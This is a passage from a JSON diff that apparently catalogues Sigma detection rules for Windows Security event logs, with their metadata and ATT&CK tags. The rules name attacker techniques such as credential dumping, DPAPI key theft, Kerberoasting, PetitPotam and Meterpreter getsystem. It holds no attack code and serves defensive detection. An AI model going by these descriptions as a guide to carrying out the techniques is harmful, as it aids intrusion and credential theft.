] + }, + "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "value": "Reconnaissance Activity" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "value": "Invoke-Obfuscation Via Use Clip - Security" + }, + { + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_atsvc_task.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" + ] + }, + "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", + "value": "Remote Task Creation via ATSVC Named Pipe" + }, + { + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_replay_attack_detected.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" + ], + "tags": "No established tags" + }, + "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", + "value": "Replay Attack Detected" + }, + { + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/07/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_sysmon_channel_reference_deletion.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SecurityJosh/status/1283027365770276866", + "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", + "https://twitter.com/Flangvik/status/1283054508084473861", + "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "value": "Sysmon Channel Reference Deletion" + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "meta": { + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2017/03/05", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "filename": "win_security_mal_creddumper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ] + }, + "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", + "value": "Credential Dumping Tools Service Execution - Security" + }, + { + "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.004" + ] + }, + "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "value": "DPAPI Domain Master Key Backup Attempt" + }, + { + "description": "Detects non-system users failing to get a handle of the SCM database.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_scm_database_handle_failure.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1010" + ] + }, + "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "value": "SCM Database Handle Failure" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security" + }, + { + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "cfeed607-6aa4-4bbd-9627-b637deb723c8", + "value": "New or Renamed User Account with '$' in Attribute 'SamAccountName'" + }, + { + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "meta": { + "author": "Tim Shelton (HAWK.IO)", + "creation_date": "2021/12/06", + "falsepositive": [ + "Read only access list authority" + ], + "filename": "win_security_net_share_obj_susp_desktop_ini.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "value": "Windows Network Access Suspicious desktop.ini Action" + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "meta": { + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "filename": "win_security_tap_driver_installation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", + "value": "Tap Driver Installation - Security" + }, + { + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "meta": { + "author": "Mauricio Velazco, Michael Haag", + "creation_date": "2021/09/02", + "falsepositive": [ + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + ], + "filename": "win_security_petitpotam_susp_tgt_request.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", + "https://github.com/topotam/PetitPotam", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1187" + ] + }, + "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "value": "PetitPotam Suspicious Kerberos TGT Request" + }, + { + "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools.\nSo you have to work with a whitelist to find the bad stuff.\n", + "meta": { + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "creation_date": "2019/04/08", + "falsepositive": [ + "Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers." + ], + "filename": "win_security_user_driver_loaded.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f63508a0-c809-4435-b3be-ed819394d612", + "value": "Suspicious Driver Loaded By User" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_var_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", + "value": "Invoke-Obfuscation VAR+ Launcher - Security" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Highly unlikely" + ], + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security" + }, + { + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "meta": { + "author": "@SBousseaden, Florian Roth", + "creation_date": "2019/11/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_rottenpotato.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1195284233729777665", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rottenpotato.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" + ] + }, + "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", + "value": "RottenPotato Like Attack Pattern" + }, + { + "description": "Detects service ticket requests using RC4 encryption type", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/06", + "falsepositive": [ + "Service accounts used on legacy systems (e.g. NetApp)", + "Windows Domains with DFL 2003 and legacy systems" + ], + "filename": "win_security_susp_rc4_kerberos.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=3458", + "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "value": "Suspicious Kerberos RC4 Ticket Encryption" + }, + { + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/09/02", + "falsepositive": [ + "SCCM" + ], + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scrcons_remote_wmi_scripteventconsumer.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "value": "Remote WMI ActiveScriptEventConsumers" + }, + { + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "meta": { + "author": "@BarryShooshooga", + "creation_date": "2019/10/26", + "falsepositive": [ + "Intended inclusions by administrator" + ], + "filename": "win_security_defender_bypass.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_defender_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "value": "Windows Defender Exclusion Set" + }, + { + "description": "Detects known sensitive file extensions accessed on a network share", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "filename": "win_security_susp_raccess_sensitive_fext.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" + ], + "tags": [ + "attack.collection", + "attack.t1039" + ] + }, + "uuid": "91c945bc-2ad1-4799-a591-4d00198a1215", + "value": "Suspicious Access to Sensitive File Extensions" + }, + { + "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", + "meta": { + "author": "Keith Wright", + "creation_date": "2019/11/20", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_external_device.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml" + ], + "tags": [ + "attack.t1091", + "attack.t1200", + "attack.lateral_movement", + "attack.initial_access" + ] + }, + "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "value": "External Disk Drive Or USB Storage Device" + }, + { + "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_add_remove_computer.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" + ], + "tags": "No established tags" + }, + "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "value": "Add or Remove Computer from DC" + }, + { + "description": "Detects non-system users performing privileged operation os the SCM database", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "creation_date": "2019/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_scm_database_privileged_operation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", + "value": "SCM Database Privileged Operation" + }, + { + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "meta": { + "author": "James Pemberton / @4A616D6573", + "creation_date": "2019/10/31", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_local_anon_logon_created.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1189469425482829824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" + ] + }, + "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created" + }, + { + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective schdueled tasks in order to conduct data destructive activities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_scheduled_task_delete.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "value": "Important Scheduled Task Deleted/Disabled" + }, + { + "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/23", + "falsepositive": [ + "Software installation", + "Software updates" + ], + "filename": "win_security_rare_schtasks_creations.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "car.2013-08-001", + "attack.t1053.005" + ] + }, + "uuid": "b0d77106-7bb0-41fe-bd94-d1752164d066", + "value": "Rare Schtasks Creations" + }, + { + "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_protected_storage_service_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "45545954-4016-43c6-855e-eae8f1c369dc", + "value": "Protected Storage Service Access" + }, + { + "description": "Detects powershell script installed as a Service", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_powershell_script_installed_as_service.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "value": "PowerShell Scripts Installed as Services - Security" + }, + { + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "meta": { + "author": "Florian Roth (rule), Adam Bradbury (idea)", + "creation_date": "2019/06/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_security_rdp_bluekeep_poc_scanner.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ] + }, + "uuid": "8400629e-79a9-4737-b387-5db940ab2367", + "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln" + }, + { + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "meta": { + "author": "Pushkarev Dmitry", + "creation_date": "2020/06/27", + "falsepositive": [ + "Valid user was not added to RDP group" + ], + "filename": "win_security_not_allowed_rdp_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "value": "Denied Access To Remote Desktop" + }, + { + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Legitimate use of Hybrid Connection Manager via Azure function apps." + ], + "filename": "win_security_hybridconnectionmgr_svc_installation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ] + }, + "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "value": "HybridConnectionManager Service Installation" + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "e98374a6-e2d9-4076-9b5c-11bdb2569995", + "value": "Failed Logins with Different Accounts from Single Source System" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security" + }, + { + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "If source account name is not an admin then its super suspicious" + ], + "filename": "win_security_account_discovery.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "value": "AD Privileged Users or Groups Reconnaissance" + }, + { + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/07/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_ad_replication_non_machine_account.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.006" + ] + }, + "uuid": "17d619c1-e020-4347-957e-1d1207455c93", + "value": "Active Directory Replication from Non Machine Account" + }, + { + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/09", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" + ], + "tags": "No established tags" + }, + "uuid": "571498c8-908e-40b4-910b-d2369159a3da", + "value": "Password Protected ZIP File Opened (Email Attachment)" + }, + { + "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_workstation_was_locked.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml" + ], + "tags": "No established tags" + }, + 